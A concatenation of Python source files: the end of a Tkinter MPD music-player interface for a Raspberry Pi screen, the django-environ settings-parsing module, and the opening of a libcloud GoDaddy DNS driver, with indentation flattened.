if self.screen == "1.P":
selection = int(self.listbox.curselection()[0]) + 1
if selection > 1:
self.footer_text_var.set(str("Press 1 + OK to Delete Playlist"))
keyMode = 'TEXT'
textBackAction = "PLAYLISTS"
textSaveAction = "DELETE_PLAYLIST"
if self.screen == "1.Q":
self.footer_text_var.set(str("Press OK to remove Song"))
keyMode = 'TEXT'
textBackAction = "QUEUE"
textSaveAction = "DELETE_SONG"
return
if keycode == config["PISCREEN_KEYS"]["down"]: # down
if self.listbox.size() > 0:
selection = int(self.listbox.curselection()[0])
count = self.listbox.size()
if selection < (count - 1):
self.listbox.select_clear(selection)
self.listbox.selection_set(selection + 1)
self.listbox.event_generate("<<ListboxSelect>>")
return
if keycode == config["PISCREEN_KEYS"]["up"]: # up
if self.listbox.size() > 0:
selection = int(self.listbox.curselection()[0])
if selection > 0:
self.listbox.select_clear(selection)
self.listbox.selection_set(selection - 1)
self.listbox.event_generate("<<ListboxSelect>>")
return
if keycode == config["PISCREEN_KEYS"]["left"] or keycode == config["PISCREEN_KEYS"]["back"]: # left or escape
if self.screen != "1":
menu = self.screen.rsplit(".", maxsplit=1)
new_screen = menu[0]
self.screen = new_screen
self.show_screen()
else:
self.screen = ''
songChanged = True
self.show_screen()
return
if keycode == config["PISCREEN_KEYS"]["right"] or keycode == config["PISCREEN_KEYS"]["ok"]: # right or return
if self.listbox.size() > 0:
selection = int(self.listbox.curselection()[0]) + 1
new_screen = self.screen + "." + str(selection)
if new_screen in self.screen_data:
if type(self.screen_data[new_screen]) is list:
self.screen = new_screen
self.show_screen()
else:
self.run_command(self.screen_data[new_screen]["ACTION"])
else:
if str(new_screen).startswith("1.Q."):
menu = new_screen.rsplit(".", maxsplit=1)
client.playid(int(queue[int(menu[1]) - 1]["id"]))
return
if str(new_screen).startswith("1.P."):
menu = new_screen.rsplit(".", maxsplit=1)
if menu[1] == "1":
keyMode = 'TEXT'
textBackAction = 'PLAYLISTS'
textSaveAction = 'SAVE_PLAYLIST'
textEntry = ''
self.footer_text_var.set('Back to Cancel, Ok to Save')
else:
playlist = playlists[int(menu[1]) - 1]['playlist']
client.clear()
client.load(playlist)
client.play()
return
if str(new_screen).startswith("1.3.A"):
if new_screen.count(".") == 3:
menu = new_screen.rsplit(".", maxsplit=1)
selectedArtist = artists[int(menu[1]) - 1]
albums = []
albums = client.list("album", selectedArtist)
albums[:0] = ["Add All"]
self.footer_text_var.set("SELECTED Artist " + selectedArtist)
self.screen = new_screen
self.screen_data[new_screen] = albums
self.show_screen()
return
elif new_screen.count(".") == 4:
menu = new_screen.rsplit(".", maxsplit=1)
if menu[1] == "1": # add all
client.findadd("artist", selectedArtist)
self.footer_text_var.set("Added All for " + selectedArtist)
self.screen = menu[0].rsplit(".", maxsplit=1)[0]
self.show_screen()
else:
selectedAlbum = albums[int(menu[1]) - 1]
songs = client.list("title", "album", selectedAlbum, "artist", selectedArtist)
songs[:0] = ["Add All"]
self.screen = new_screen
self.screen_data[new_screen] = songs
self.show_screen()
self.footer_text_var.set("Album Selected " + selectedAlbum)
return
elif new_screen.count(".") == 5:
menu = new_screen.rsplit(".", maxsplit=1)
if menu[1] == "1": # add all
client.findadd("album", selectedAlbum, "artist", selectedArtist)
self.footer_text_var.set("Added All for " + selectedAlbum + "/" + selectedArtist)
self.screen = menu[0].rsplit(".", maxsplit=1)[0]
self.show_screen()
else:
selected_song = songs[int(menu[1]) - 1]
client.findadd("title", selected_song, "album", selectedAlbum, "artist", selectedArtist)
self.footer_text_var.set(
"Added " + selected_song + "/" + selectedAlbum + "/" + selectedArtist)
return
if str(new_screen).startswith("1.3.B"):
menu = new_screen.rsplit(".", maxsplit=1)
if new_screen.count(".") == 3:
selectedAlbum = albums[int(menu[1]) - 1]
songs = client.list("title", "album", selectedAlbum)
songs[:0] = ["Add All"]
self.screen = new_screen
self.screen_data[new_screen] = songs
self.show_screen()
self.footer_text_var.set("Album Selected " + selectedAlbum)
if new_screen.count(".") == 4:
if menu[1] == "1": # add all
client.findadd("album", selectedAlbum)
self.footer_text_var.set("Added All for album " + selectedAlbum)
self.screen = menu[0].rsplit(".", maxsplit=1)[0]
self.show_screen()
else:
selected_song = songs[int(menu[1]) - 1]
client.findadd("title", selected_song, "album", selectedAlbum)
self.footer_text_var.set("Added " + selected_song + "/" + selectedAlbum)
return
if str(new_screen).startswith("1.3.C"):
menu = new_screen.rsplit(".", maxsplit=1)
if new_screen.count(".") == 3:
selectedGenre = genres[int(menu[1]) - 1]
songs = client.list("title", "genre", selectedGenre)
self.screen = new_screen
self.screen_data[new_screen] = songs
self.show_screen()
self.footer_text_var.set("Genre Selected " + selectedAlbum)
if new_screen.count(".") == 4:
selected_song = songs[int(menu[1]) - 1]
client.findadd("title", selected_song, "genre", selectedGenre)
self.footer_text_var.set("Added " + selected_song + selectedGenre)
return
if str(new_screen).startswith("1.4.T"):
menu = new_screen.rsplit(".", maxsplit=1)
theme_name = themes[int(menu[1]) - 1]
self.footer_text_var.set("Applying Theme " + theme_name)
self.apply_theme()
return
if keycode == config["PISCREEN_KEYS"]["vol_up"]:
if self.volume < 100:
self.volume += 1
client.setvol(self.volume)
volumeChanged = True
self.footer_text_var.set("Volume Up")
else:
self.footer_text_var.set("Volume Max!!")
return
if keycode == config["PISCREEN_KEYS"]["vol_down"]:
if self.volume > 0:
self.volume -= 1
client.setvol(self.volume)
volumeChanged = True
self.footer_text_var.set("Volume Down")
else:
self.footer_text_var.set("Volume Zero!!")
return
if keycode == config["PISCREEN_KEYS"]["play"]:
if status["state"] == "play":
client.pause()
self.footer_text_var.set("Paused")
else:
client.play()
self.footer_text_var.set("Playing")
return
if keycode == config["PISCREEN_KEYS"]["next"]:
client.next()
self.footer_text_var.set("Next Song")
return
if keycode == config["PISCREEN_KEYS"]["prev"]:
client.previous()
self.footer_text_var.set("Previous Song")
return
if keycode == config["PISCREEN_KEYS"]["home"]:
self.screen = ''
self.show_screen()
return
if keycode == config["PISCREEN_KEYS"]["power"]:
if sys.platform.startswith('linux'):
call("sudo nohup shutdown -h now", shell=True)
else:
self.footer_text_var.set("Can't PowerOff from remote")
return
self.footer_text_var.set("UNKNOWN " + keycode)
def run_command(self, action):
global client, keyMode, textEntry, status
global albums, artists, queue, songs, playlists, genres, themes
if action == "QUEUE":
local_queue = client.playlistinfo()
queue.clear()
for item in local_queue:
queue.append(item)
self.screen = "1.Q"
self.screen_data["1.Q"] = queue
self.footer_text_var.set("Right to play Song, Menu to delete")
self.show_screen()
elif action == "PLAYLISTS":
playlists = client.listplaylists()
playlists[:0] = ["SAVE PLAYLIST"]
self.screen = "1.P"
self.screen_data["1.P"] = playlists
self.footer_text_var.set("Right to play Playlist, Menu to delete")
self.show_screen()
elif action == "ARTISTS":
artists = client.list("artist")
self.screen = "1.3.A"
self.screen_data["1.3.A"] = artists
self.show_screen()
elif action == "ALBUMS":
albums = client.list("album")
self.screen = "1.3.B"
self.screen_data["1.3.B"] = albums
self.show_screen()
elif action == "GENRES":
genres = client.list("genre")
self.screen = "1.3.C"
self.screen_data["1.3.C"] = genres
self.show_screen()
elif action == "UPDATE_LIBRARY":
self.footer_text_var.set("Updating library")
client.update()
elif action == "THEMES":
self.footer_text_var.set("Select Theme")
themes = ["default", "foofighters", "light"]
self.screen = "1.4.T"
self.screen_data["1.4.T"] = themes
self.show_screen()
elif action == "SAVE_PLAYLIST":
keyMode = 'MENU'
found = False
if textEntry == '':
self.footer_text_var.set("Name Empty!!")
return
for playlist in playlists:
if isinstance(playlist, str) is False and textEntry == playlist['playlist']:
found = True
if found:
client.rm(textEntry)
client.save(textEntry)
else:
client.save(textEntry)
self.footer_text_var.set("Saved Playlist " + textEntry)
textEntry = ''
self.run_command("PLAYLISTS")
elif action == "DELETE_PLAYLIST":
keyMode = 'MENU'
if textEntry == '1':
selection = int(self.listbox.curselection()[0])
client.rm(playlists[selection]['playlist'])
textEntry = ''
self.run_command("PLAYLISTS")
elif action == "DELETE_SONG":
keyMode = 'MENU'
client.delete(int(self.listbox.curselection()[0]))
textEntry = ''
self.run_command("QUEUE")
elif action == "CLEAR":
self.footer_text_var.set("Clearing Queue")
client.clear()
elif action == "RANDOM":
if status['random'] == '0':
client.random('1')
else:
client.random('0')
status = client.status()
self.screen_data['1'][5] = "RANDOM " + status['random']
self.update_random()
self.show_screen()
elif action == "REPEAT":
if status['repeat'] == '0':
client.repeat('1')
else:
client.repeat('0')
status = client.status()
self.screen_data['1'][6] = "REPEAT " + status['repeat']
self.update_repeat()
self.show_screen()
elif action == "SINGLE":
if status['single'] == '0':
client.single('1')
else:
client.single('0')
status = client.status()
self.screen_data['1'][7] = "SINGLE " + status['single']
self.update_single()
self.show_screen()
elif action == "CONSUME":
if status['consume'] == '0':
client.consume('1')
else:
client.consume('0')
status = client.status()
self.screen_data['1'][8] = "CONSUME " + status['consume']
self.show_screen()
self.update()
return
def load_icons(self):
self.update_random()
self.update_repeat()
self.update_single()
def update_random(self):
global status, theme, icon_random
fgcolor = ImageColor.getrgb(theme['PLAYER']['foreground'])
bgcolor = ImageColor.getrgb(theme['PLAYER']['background'])
fgcolor += (255,)
bgcolor += (255,)
icon_random = Image.open('./icons/ic_shuffle_white_36dp.png')
if icon_random.mode != 'RGBA':
icon_random = icon_random.convert('RGBA')
data = list(icon_random.getdata())
newData = list()
for pixel in data:
if pixel[3] != 0:
if status['random'] == '1':
newData.append(fgcolor)
else:
newData.append(bgcolor)
else:
newData.append(pixel)
icon_random.putdata(newData)
icon_random = ImageTk.PhotoImage(icon_random.resize((36, 36), Image.ANTIALIAS))
def update_single(self):
global status, theme, icon_single
fgcolor = ImageColor.getrgb(theme['PLAYER']['foreground'])
bgcolor = ImageColor.getrgb(theme['PLAYER']['background'])
fgcolor += (255,)
bgcolor += (255,)
icon_single = Image.open('./icons/ic_repeat_one_white_36dp.png')
if icon_single.mode != 'RGBA':
icon_single = icon_single.convert('RGBA')
data = list(icon_single.getdata())
newData = list()
for pixel in data:
if pixel[3] != 0:
if status['single'] == '1':
newData.append(fgcolor)
else:
newData.append(bgcolor)
else:
newData.append(pixel)
icon_single.putdata(newData)
icon_single = ImageTk.PhotoImage(icon_single.resize((36, 36), Image.ANTIALIAS))
def update_repeat(self):
global status, theme, icon_repeat
fgcolor = ImageColor.getrgb(theme['PLAYER']['foreground'])
bgcolor = ImageColor.getrgb(theme['PLAYER']['background'])
fgcolor += (255,)
bgcolor += (255,)
icon_repeat = Image.open('./icons/ic_repeat_white_36dp.png')
if icon_repeat.mode != 'RGBA':
icon_repeat = icon_repeat.convert('RGBA')
data = list(icon_repeat.getdata())
newData = list()
for pixel in data:
if pixel[3] != 0:
if status['repeat'] == '1':
newData.append(fgcolor)
else:
newData.append(bgcolor)
else:
newData.append(pixel)
icon_repeat.putdata(newData)
icon_repeat = ImageTk.PhotoImage(icon_repeat.resize((36, 36), Image.ANTIALIAS))
def apply_theme(self):
global theme_name, theme, config, bg
my_file = Path('./theme/' + theme_name + '/theme.ini')
if my_file.is_file():
theme = configparser.ConfigParser()
theme.read('./theme/' + theme_name + '/theme.ini')
# player related settings
bg = None
self.playerScreen.configure(bg=theme['PLAYER']['background'])
self.load_icons()
# menu related settings
self.headerFrame.configure(bg=theme['HEADER']['background'])
self.currentSongLabel.configure(font=(theme['HEADER']['font'], 12, 'bold'),
bg=theme['HEADER']['background'], foreground=theme['HEADER']['foreground'])
self.volumeLabel.configure(font=(theme['HEADER']['font'], 10, 'bold'), bg=theme['HEADER']['background'],
foreground=theme['HEADER']['foreground'])
self.listbox.configure(font=(theme['MAIN']['font'], 11), bg=theme['MAIN']['background'],
fg=theme['MAIN']['foreground'], selectbackground=theme['MAIN']['selected'],
selectforeground=theme['MAIN']['foreground'])
self.footer.configure(font=(theme['FOOTER']['font'], 10, 'bold'), bg=theme['FOOTER']['background'],
foreground=theme['FOOTER']['foreground'])
# write theme to config.ini
config["THEME"]["theme"] = theme_name
with open('config.ini', 'w') as configfile:
config.write(configfile)
else:
self.footer_text_var.set("Theme Not Found")
theme_name = config["THEME"]["theme"]
app = PiScreen(root)
app.mainloop()
|
|
"""
Django-environ allows you to utilize 12factor inspired environment
variables to configure your Django application.
"""
from __future__ import unicode_literals
import os
import sys
import re
import json
import warnings
import logging
logger = logging.getLogger(__file__)
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
class ImproperlyConfigured(Exception):
pass
try:
import urllib.parse as urlparse
except ImportError:
# Python <= 2.6
import urlparse
if sys.version < '3':
text_type = unicode
else:
text_type = str
basestring = str
__author__ = 'joke2k'
__version__ = (0, 3, 1)
# return int if possible
_cast_int = lambda v: int(v) if isinstance(v, basestring) and v.isdigit() else v
# return str if possibile
_cast_str = lambda v: str(v) if isinstance(v, basestring) else v
class NoValue(object):
def __repr__(self):
return '<{0}>'.format(self.__class__.__name__)
class Env(object):
"""Provide schema-based lookups of environment variables so that each
caller doesn't have to pass in `cast` and `default` parameters.
Usage:::
env = Env(MAIL_ENABLED=bool, SMTP_LOGIN=(str, 'DEFAULT'))
if env('MAIL_ENABLED'):
...
"""
NOTSET = NoValue()
BOOLEAN_TRUE_STRINGS = ('true', 'on', 'ok', 'y', 'yes', '1')
URL_CLASS = urlparse.ParseResult
DEFAULT_DATABASE_ENV = 'DATABASE_URL'
DB_SCHEMES = {
'postgres': 'django.db.backends.postgresql_psycopg2',
'postgresql': 'django.db.backends.postgresql_psycopg2',
'psql': 'django.db.backends.postgresql_psycopg2',
'pgsql': 'django.db.backends.postgresql_psycopg2',
'postgis': 'django.contrib.gis.db.backends.postgis',
'mysql': 'django.db.backends.mysql',
'mysql2': 'django.db.backends.mysql',
'mysqlgis': 'django.contrib.gis.db.backends.mysql',
'spatialite': 'django.contrib.gis.db.backends.spatialite',
'sqlite': 'django.db.backends.sqlite3',
'ldap': 'ldapdb.backends.ldap',
}
_DB_BASE_OPTIONS = ['CONN_MAX_AGE', 'ATOMIC_REQUESTS', 'AUTOCOMMIT']
DEFAULT_CACHE_ENV = 'CACHE_URL'
CACHE_SCHEMES = {
'dbcache': 'django.core.cache.backends.db.DatabaseCache',
'dummycache': 'django.core.cache.backends.dummy.DummyCache',
'filecache': 'django.core.cache.backends.filebased.FileBasedCache',
'locmemcache': 'django.core.cache.backends.locmem.LocMemCache',
'memcache': 'django.core.cache.backends.memcached.MemcachedCache',
'pymemcache': 'django.core.cache.backends.memcached.PyLibMCCache',
'rediscache': 'redis_cache.cache.RedisCache',
'redis': 'redis_cache.cache.RedisCache',
}
_CACHE_BASE_OPTIONS = ['TIMEOUT', 'KEY_PREFIX', 'VERSION', 'KEY_FUNCTION']
DEFAULT_EMAIL_ENV = 'EMAIL_URL'
EMAIL_SCHEMES = {
'smtp': 'django.core.mail.backends.smtp.EmailBackend',
'smtps': 'django.core.mail.backends.smtp.EmailBackend',
'consolemail': 'django.core.mail.backends.console.EmailBackend',
'filemail': 'django.core.mail.backends.filebased.EmailBackend',
'memorymail': 'django.core.mail.backends.locmem.EmailBackend',
'dummymail': 'django.core.mail.backends.dummy.EmailBackend'
}
_EMAIL_BASE_OPTIONS = ['EMAIL_USE_TLS', ]
DEFAULT_SEARCH_ENV = 'SEARCH_URL'
SEARCH_SCHEMES = {
"elasticsearch": "haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine",
"solr": "haystack.backends.solr_backend.SolrEngine",
"whoosh": "haystack.backends.whoosh_backend.WhooshEngine",
"simple": "haystack.backends.simple_backend.SimpleEngine",
}
def __init__(self, **schema):
self.schema = schema
def __call__(self, var, cast=None, default=NOTSET, parse_default=False):
return self.get_value(var, cast=cast, default=default, parse_default=parse_default)
# Shortcuts
def str(self, var, default=NOTSET):
"""
:rtype: str
"""
return self.get_value(var, default=default)
def unicode(self, var, default=NOTSET):
"""Helper for python2
:rtype: unicode
"""
return self.get_value(var, cast=text_type, default=default)
def bool(self, var, default=NOTSET):
"""
:rtype: bool
"""
return self.get_value(var, cast=bool, default=default)
def int(self, var, default=NOTSET):
"""
:rtype: int
"""
return self.get_value(var, cast=int, default=default)
def float(self, var, default=NOTSET):
"""
:rtype: float
"""
return self.get_value(var, cast=float, default=default)
def json(self, var, default=NOTSET):
"""
:returns: Json parsed
"""
return self.get_value(var, cast=json.loads, default=default)
def list(self, var, cast=None, default=NOTSET):
"""
:rtype: list
"""
return self.get_value(var, cast=list if not cast else [cast], default=default)
def dict(self, var, cast=dict, default=NOTSET):
"""
:rtype: dict
"""
return self.get_value(var, cast=cast, default=default)
def url(self, var, default=NOTSET):
"""
:rtype: urlparse.ParseResult
"""
return self.get_value(var, cast=urlparse.urlparse, default=default, parse_default=True)
def db_url(self, var=DEFAULT_DATABASE_ENV, default=NOTSET, engine=None):
"""Returns a config dictionary, defaulting to DATABASE_URL.
:rtype: dict
"""
return self.db_url_config(self.get_value(var, default=default), engine=engine)
db=db_url
def cache_url(self, var=DEFAULT_CACHE_ENV, default=NOTSET, backend=None):
"""Returns a config dictionary, defaulting to CACHE_URL.
:rtype: dict
"""
return self.cache_url_config(self.url(var, default=default), backend=backend)
cache=cache_url
def email_url(self, var=DEFAULT_EMAIL_ENV, default=NOTSET, backend=None):
"""Returns a config dictionary, defaulting to EMAIL_URL.
:rtype: dict
"""
return self.email_url_config(self.url(var, default=default), backend=backend)
email=email_url
def search_url(self, var=DEFAULT_SEARCH_ENV, default=NOTSET, engine=None):
"""Returns a config dictionary, defaulting to SEARCH_URL.
:rtype: dict
"""
return self.search_url_config(self.url(var, default=default), engine=engine)
def path(self, var, default=NOTSET, **kwargs):
"""
:rtype: Path
"""
return Path(self.get_value(var, default=default), **kwargs)
def get_value(self, var, cast=None, default=NOTSET, parse_default=False):
"""Return value for given environment variable.
:param var: Name of variable.
:param cast: Type to cast return value as.
:param default: If var not present in environ, return this instead.
:param parse_default: force to parse default..
:returns: Value from environment or default (if set)
"""
logger.debug("get '{0}' casted as '{1}' with default '{2}'".format(var, cast, default))
if var in self.schema:
var_info = self.schema[var]
try:
has_default = len(var_info) == 2
except TypeError:
has_default = False
if has_default:
if not cast:
cast = var_info[0]
if default is self.NOTSET:
try:
default = var_info[1]
except IndexError:
pass
else:
if not cast:
cast = var_info
try:
value = os.environ[var]
except KeyError:
if default is self.NOTSET:
error_msg = "Set the {0} environment variable".format(var)
raise ImproperlyConfigured(error_msg)
value = default
# Resolve any proxied values
if hasattr(value, 'startswith') and value.startswith('$'):
value = value.lstrip('$')
value = self.get_value(value, cast=cast, default=default)
if value != default or parse_default:
value = self.parse_value(value, cast)
return value
# Class and static methods
@classmethod
def parse_value(cls, value, cast):
"""Parse and cast provided value
:param value: Stringed value.
:param cast: Type to cast return value as.
:returns: Casted value
"""
if cast is None:
return value
elif cast is bool:
try:
value = int(value) != 0
except ValueError:
value = value.lower() in cls.BOOLEAN_TRUE_STRINGS
elif isinstance(cast, list):
value = list(map(cast[0], [x for x in value.split(',') if x]))
elif isinstance(cast, dict):
key_cast = cast.get('key', str)
value_cast = cast.get('value', text_type)
value_cast_by_key = cast.get('cast', dict())
value = dict(map(
lambda kv: (key_cast(kv[0]), cls.parse_value(kv[1], value_cast_by_key.get(kv[0], value_cast))),
[val.split('=') for val in value.split(';') if val]
))
elif cast is dict:
#elif hasattr(cast, '__name__') and cast.__name__ == 'dict':
value = dict([val.split('=') for val in value.split(',') if val])
elif cast is list:
value = [x for x in value.split(',') if x]
elif cast is float:
# clean string
float_str = re.sub(r'[^\d,\.]', '', value)
# split for avoid thousand separator and different locale comma/dot symbol
parts = re.split(r'[,\.]', float_str)
if len(parts) == 1:
float_str = parts[0]
else:
float_str = "{0}.{1}".format(''.join(parts[0:-1]), parts[-1])
value = float(float_str)
else:
value = cast(value)
return value
@classmethod
def db_url_config(cls, url, engine=None):
"""Pulled from DJ-Database-URL, parse an arbitrary Database URL.
Support currently exists for PostgreSQL, PostGIS, MySQL and SQLite.
SQLite connects to file based databases. The same URL format is used, omitting the hostname,
and using the "file" portion as the filename of the database.
This has the effect of four slashes being present for an absolute file path:
>>> from environ import Env
>>> Env.db_url_config('sqlite:////full/path/to/your/file.sqlite')
{'ENGINE': 'django.db.backends.sqlite3', 'HOST': None, 'NAME': '/full/path/to/your/file.sqlite', 'PASSWORD': None, 'PORT': None, 'USER': None}
>>> Env.db_url_config('postgres://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn')
{'ENGINE': 'django.db.backends.postgresql_psycopg2', 'HOST': 'ec2-107-21-253-135.compute-1.amazonaws.com', 'NAME': 'd8r82722r2kuvn', 'PASSWORD': 'wegauwhgeuioweg', 'PORT': 5431, 'USER': 'uf07k1i6d8ia0v'}
"""
if not isinstance(url, cls.URL_CLASS):
if url == 'sqlite://:memory:':
# this is a special case, because if we pass this URL into
# urlparse, urlparse will choke trying to interpret "memory"
# as a port number
return {
'ENGINE': cls.DB_SCHEMES['sqlite'],
'NAME': ':memory:'
}
# note: no other settings are required for sqlite
url = urlparse.urlparse(url)
config = {}
# Remove query strings.
path = url.path[1:]
path = path.split('?', 2)[0]
# if we are using sqlite and we have no path, then assume we
# want an in-memory database (this is the behaviour of sqlalchemy)
if url.scheme == 'sqlite' and path == '':
path = ':memory:'
if url.scheme == 'ldap':
path = '{scheme}://{hostname}'.format(scheme=_cast_str(url.scheme), hostname=_cast_str(url.hostname))
if url.port:
path += ':{port}'.format(port=_cast_str(url.port))
# Update with environment configuration.
config.update({
'NAME': path,
'USER': _cast_str(url.username),
'PASSWORD': _cast_str(url.password),
'HOST': _cast_str(url.hostname),
'PORT': _cast_int(url.port),
})
if url.query:
config_options = {}
for k, v in urlparse.parse_qs(url.query).items():
if k.upper() in cls._DB_BASE_OPTIONS:
config.update({k.upper(): _cast_int(v[0])})
else:
config_options.update({k: _cast_int(v[0])})
config['OPTIONS'] = config_options
if engine:
config['ENGINE'] = engine
if url.scheme in Env.DB_SCHEMES:
config['ENGINE'] = Env.DB_SCHEMES[url.scheme]
if not config.get('ENGINE', False):
warnings.warn("Engine not recognized from url: {0}".format(config))
return {}
return config
@classmethod
def cache_url_config(cls, url, backend=None):
"""Pulled from DJ-Cache-URL, parse an arbitrary Cache URL.
:param url:
:param overrides:
:return:
"""
url = urlparse.urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
location = url.netloc.split(',')
if len(location) == 1:
location = location[0]
config = {
'BACKEND': cls.CACHE_SCHEMES[url.scheme],
'LOCATION': location,
}
if url.scheme == 'filecache':
config.update({
'LOCATION': _cast_str(url.netloc + url.path),
})
if url.path and url.scheme in ['memcache', 'pymemcache', 'rediscache']:
config.update({
'LOCATION': 'unix:' + url.path,
})
if url.query:
config_options = {}
for k, v in urlparse.parse_qs(url.query).items():
opt = {k.upper(): _cast_int(v[0])}
if k.upper() in cls._CACHE_BASE_OPTIONS:
config.update(opt)
else:
config_options.update(opt)
config['OPTIONS'] = config_options
if backend:
config['BACKEND'] = backend
return config
@classmethod
def email_url_config(cls, url, backend=None):
"""Parses an email URL."""
config = {}
url = urlparse.urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
# Remove query strings
path = url.path[1:]
path = path.split('?', 2)[0]
# Update with environment configuration
config.update({
'EMAIL_FILE_PATH': path,
'EMAIL_HOST_USER': _cast_str(url.username),
'EMAIL_HOST_PASSWORD': _cast_str(url.password),
'EMAIL_HOST': _cast_str(url.hostname),
'EMAIL_PORT': _cast_int(url.port),
})
if backend:
config['EMAIL_BACKEND'] = backend
elif url.scheme in cls.EMAIL_SCHEMES:
config['EMAIL_BACKEND'] = cls.EMAIL_SCHEMES[url.scheme]
if url.scheme == 'smtps':
config['EMAIL_USE_TLS'] = True
else:
config['EMAIL_USE_TLS'] = False
if url.query:
config_options = {}
for k, v in urlparse.parse_qs(url.query).items():
opt = {k.upper(): _cast_int(v[0])}
if k.upper() in cls._EMAIL_BASE_OPTIONS:
config.update(opt)
else:
config_options.update(opt)
config['OPTIONS'] = config_options
return config
@classmethod
def search_url_config(cls, url, engine=None):
config = {}
url = urlparse.urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
# Remove query strings.
path = url.path[1:]
path = path.split('?', 2)[0]
if url.scheme in cls.SEARCH_SCHEMES:
config["ENGINE"] = cls.SEARCH_SCHEMES[url.scheme]
if path.endswith("/"):
path = path[:-1]
split = path.rsplit("/", 1)
if len(split) > 1:
path = split[:-1]
index = split[-1]
else:
path = ""
index = split[0]
config.update({
"URL": urlparse.urlunparse(("http",) + url[1:2] + (path,) + url[3:]),
"INDEX_NAME": index,
})
if path:
config.update({
"PATH": path,
})
if engine:
config['ENGINE'] = engine
return config
@staticmethod
def read_env(env_file=None, **overrides):
"""Read a .env file into os.environ.
If not given a path to a dotenv path, does filthy magic stack backtracking
to find manage.py and then find the dotenv.
http://www.wellfireinteractive.com/blog/easier-12-factor-django/
https://gist.github.com/bennylope/2999704
"""
if env_file is None:
frame = sys._getframe()
env_file = os.path.join(os.path.dirname(frame.f_back.f_code.co_filename), '.env')
if not os.path.exists(env_file):
warnings.warn("not reading %s - it doesn't exist." % env_file)
return
try:
with open(env_file) if isinstance(env_file, basestring) else env_file as f:
content = f.read()
except IOError:
warnings.warn("not reading %s - it doesn't exist." % env_file)
return
logger.debug('Read environment variables from: {0}'.format(env_file))
for line in content.splitlines():
m1 = re.match(r'\A([A-Za-z_0-9]+)=(.*)\Z', line)
if m1:
key, val = m1.group(1), m1.group(2)
m2 = re.match(r"\A'(.*)'\Z", val)
if m2:
val = m2.group(1)
m3 = re.match(r'\A"(.*)"\Z', val)
if m3:
val = re.sub(r'\\(.)', r'\1', m3.group(1))
os.environ.setdefault(key, text_type(val))
# set defaults
for key, value in overrides.items():
os.environ.setdefault(key, value)
class Path(object):
"""Inspired to Django Two-scoops, handling File Paths in Settings.
>>> from environ import Path
>>> root = Path('/home')
>>> root, root(), root('dev')
(<Path:/home>, '/home', '/home/dev')
>>> root == Path('/home')
True
>>> root in Path('/'), root not in Path('/other/path')
(True, True)
>>> root('dev', 'not_existing_dir', required=True)
Traceback (most recent call last):
environ.environ.ImproperlyConfigured: Create required path: /home/not_existing_dir
>>> public = root.path('public')
>>> public, public.root, public('styles')
(<Path:/home/public>, '/home/public', '/home/public/styles')
>>> assets, scripts = public.path('assets'), public.path('assets', 'scripts')
>>> assets.root, scripts.root
('/home/public/assets', '/home/public/assets/scripts')
>>> assets + 'styles', str(assets + 'styles'), ~assets
(<Path:/home/public/assets/styles>, '/home/public/assets/styles', <Path:/home/public>)
"""
def path(self, *paths, **kwargs):
"""Create new Path based on self.root and provided paths.
:param paths: List of sub paths
:param kwargs: required=False
:rtype: Path
"""
return self.__class__(self.__root__, *paths, **kwargs)
def file(self, name, *args, **kwargs):
"""Open a file.
:param name: Filename appended to self.root
:param args: passed to open()
:param kwargs: passed to open()
:rtype: file
"""
return open(self(name), *args, **kwargs)
@property
def root(self):
"""Current directory for this Path"""
return self.__root__
def __init__(self, start='', *paths, **kwargs):
super(Path, self).__init__()
if kwargs.get('is_file', False):
start = os.path.dirname(start)
self.__root__ = self._absolute_join(start, *paths, **kwargs)
def __call__(self, *paths, **kwargs):
"""Retrieve the absolute path, with appended paths
:param paths: List of sub path of self.root
:param kwargs: required=False
"""
return self._absolute_join(self.__root__, *paths, **kwargs)
def __eq__(self, other):
return self.__root__ == other.__root__
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
return Path(self.__root__, other if not isinstance(other, Path) else other.__root__)
def __sub__(self, other):
if isinstance(other, int):
return self.path('../' * other)
elif isinstance(other, (str, text_type)):
return Path(self.__root__.rstrip(other))
raise TypeError("unsupported operand type(s) for -: '{0}' and '{1}'".format(self, type(other)))
def __invert__(self):
return self.path('..')
def __contains__(self, item):
base_path = self.__root__
if len(base_path) > 1:
base_path = os.path.join(base_path, '')
return item.__root__.startswith(base_path)
def __repr__(self):
return "<Path:{0}>".format(self.__root__)
def __str__(self):
return self.__root__
def __unicode__(self):
return self.__str__()
@staticmethod
def _absolute_join(base, *paths, **kwargs):
absolute_path = os.path.abspath(os.path.join(base, *paths))
if kwargs.get('required', False) and not os.path.exists(absolute_path):
raise ImproperlyConfigured("Create required path: {0}".format(absolute_path))
return absolute_path
def register_scheme(scheme):
for method in filter(lambda s: s.startswith('uses_'), dir(urlparse)):
getattr(urlparse, method).append(scheme)
# Register database and cache schemes in URLs.
for schema in list(Env.DB_SCHEMES.keys()) + list(Env.CACHE_SCHEMES.keys()) + list(Env.SEARCH_SCHEMES.keys()) +list(Env.EMAIL_SCHEMES.keys()):
register_scheme(schema)
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'GoDaddyDNSDriver'
]
try:
import simplejson as json
except:
import json
from libcloud.common.base import ConnectionKey, JsonResponse
from libcloud.common.types import LibcloudError
from libcloud.utils.py3 import httplib
from libcloud.dns.types import Provider, RecordType, RecordDoesNotExistError
from libcloud.dns.base import DNSDriver, Zone, Record
API_ROOT = 'https://api.godaddy.com/'
VALID_RECORD_EXTRA_PARAMS = ['prio', 'ttl']
class GoDaddyDNSException(LibcloudError):
def __init__(self, code, message):
self.code = code
self.message = message
self.args = (code, message)
def __str__(self):
return self.__repr__()
def __repr__(self):
return '<GoDaddyDNSException in %d: %s>' % (self.code, self.message)
